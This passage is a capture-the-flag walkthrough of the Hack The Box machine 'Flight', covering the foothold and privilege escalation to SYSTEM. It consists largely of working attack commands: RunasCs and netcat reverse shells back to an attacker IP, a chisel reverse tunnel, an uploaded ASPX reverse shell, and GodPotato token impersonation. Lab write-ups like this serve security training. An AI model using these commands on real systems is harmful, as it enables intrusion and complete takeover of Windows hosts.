C:\\temp>.\\RunasCs.exe C.Bum Tikkycoll_431012284 powershell.exe -r 10.10.16.3:9001
[*] Warning: The logon for user 'C.Bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\\Desktop: Service-0x0-58fdd$\\Default
[+] Async process 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' with pid 4080 created in background.

C:\\temp>

└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.187] 50278
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\\Windows\\system32> whoami
whoami
flight\\c.bum
PS C:\\Windows\\system32>

And we get user.txt

PS C:\\Users\\C.Bum\\Desktop> dir
dir

    Directory: C:\\Users\\C.Bum\\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        8/19/2025   2:21 PM             34 user.txt                                                              

PS C:\\Users\\C.Bum\\Desktop>

Privilege Escalation

Shell as ?

internal port 8000

we found that there is something running on internal port 8000

Let’s use chisel

└─$ ./chisel server -p 8000 --reverse  
2025/08/20 21:38:11 server: Reverse tunnelling enabled
2025/08/20 21:38:11 server: Fingerprint djTX3b380m4VT345PaUEAlXkBzvLZyPj6h54LaSMhro=
2025/08/20 21:38:11 server: Listening on <http://0.0.0.0:8000>
2025/08/20 21:39:09 server: session#1: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/20 21:39:09 server: session#1: tun: proxy#R:8001=>8000: Listening

PS C:\\temp> .\\chisel.exe client 10.10.16.6:8000 R:8001:127.0.0.1:8000
.\\chisel.exe client 10.10.16.6:8000 R:8001:127.0.0.1:8000
2025/08/20 16:09:10 client: Connecting to ws://10.10.16.6:8000
2025/08/20 16:09:15 client: Connected (Latency 370.9469ms)

Nice I can access port 8000 via localhost:8001

└─$ nmap -sC -sV -p 8001 127.0.0.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-20 21:40 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000085s latency).

PORT     STATE SERVICE VERSION
8001/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Flight - Travel and Tour
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds

port 8000

website was not functioning

uploading Revshell (Auth as defaultapppool)

User C.Bum has Write access (not full control).

PS C:\\inetpub> icacls development
icacls development
development flight\\C.Bum:(OI)(CI)(W)
            NT SERVICE\\TrustedInstaller:(I)(F)
            NT SERVICE\\TrustedInstaller:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\\SYSTEM:(I)(F)
            NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\\Administrators:(I)(F)
            BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)
            BUILTIN\\Users:(I)(RX)
            BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
PS C:\\inetpub>

Let’s try to upload a test PHP file

Looks like we need to upload the ASP.NET file

┌──(anurag㉿anurag)-[~/htb/Flight]
└─$ cat test.aspx
<% Response.Write("Hello World") %>

Let’s upload a revshell

I will use this revshell

PS C:\\inetpub\\development> curl <http://10.10.16.6/revshell.aspx> -o revshell.aspx
curl <http://10.10.16.6/revshell.aspx> -o revshell.aspx
PS C:\\inetpub\\development> dir
dir

    Directory: C:\\inetpub\\development

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        8/20/2025   4:42 PM                css                                                                   
d-----        8/20/2025   4:42 PM                fonts                                                                 
d-----        8/20/2025   4:42 PM                img                                                                   
d-----        8/20/2025   4:42 PM                js                                                                    
-a----        4/16/2018   2:23 PM           9371 contact.html                                                          
-a----        4/16/2018   2:23 PM          45949 index.html                                                            
-a----        8/20/2025   4:42 PM          15546 revshell.aspx                                                         

PS C:\\inetpub\\development>

and load http://127.0.0.1:8001/revshell.aspx

└─$ nc -nlvp 2222
listening on [any] 2222 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.187] 54149
Spawn Shell...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\\windows\\system32\\inetsrv>whoami
whoami
iis apppool\\defaultapppool

c:\\windows\\system32\\inetsrv>

SeImpersonatePrivilege


C:\\Users>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID                                                          
========================== =============================================================
iis apppool\\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Mandatory Label\\High Mandatory Level       Label            S-1-16-12288                                                   
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\\IIS_IUSRS                          Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                           Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\\Users>

Since we have SeImpersonatePrivilege we can perform a Potato attack

I will use this

C:\\temp>.\\GodPotato-NET4.exe -cmd "cmd /c whoami"
.\\GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140712155545600
[*] DispatchTable: 0x140712157851712
[*] UseProtseqFunction: 0x140712157228240
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\\\.\\pipe\\f383a545-0b6d-4574-948e-ba1c5e1c90e3\\pipe\\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009402-05d0-ffff-fec1-967cb7707aef
[*] DCOM obj OXID: 0x219584eb64a20631
[*] DCOM obj OID: 0xa2681efa43cbb056
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 924 Token:0x816  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 1900
nt authority\\system

C:\\temp>

we can get shell or simply view root.txt

C:\\temp>.\\GodPotato-NET4.exe -cmd "cmd /c nc.exe 10.10.16.6 2233 -e cmd.exe"
.\\GodPotato-NET4.exe -cmd "cmd /c nc.exe 10.10.16.6 2233 -e cmd.exe"
[*] CombaseModule: 0x140712155545600
[*] DispatchTable: 0x140712157851712
[*] UseProtseqFunction: 0x140712157228240
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\\\.\\pipe\\9098d5e6-1183-4515-8c9f-d4ef1ec78d0d\\pipe\\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00005c02-0d7c-ffff-8630-45d3e81365ea
[*] DCOM obj OXID: 0x1fe1e7b8e6cba310
[*] DCOM obj OID: 0x3f4265f8f9cd1ae9
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 924 Token:0x816  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\\SYSTEM
[*] process start with pid 3236

└─$ nc -nlvp 2233
listening on [any] 2233 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.187] 54207
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\temp>whoami
whoami
nt authority\\system

C:\\temp>dir C:\\Users\\Administrator\\Desktop
dir C:\\Users\\Administrator\\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 1DF4-493D

 Directory of C:\\Users\\Administrator\\Desktop

09/22/2022  01:48 PM    <DIR>          .
09/22/2022  01:48 PM    <DIR>          ..
08/19/2025  02:21 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,917,837,824 bytes free

C:\\temp>

PreviousHTB | JAB NextHTB | Cerberus

Last updated 1 month ago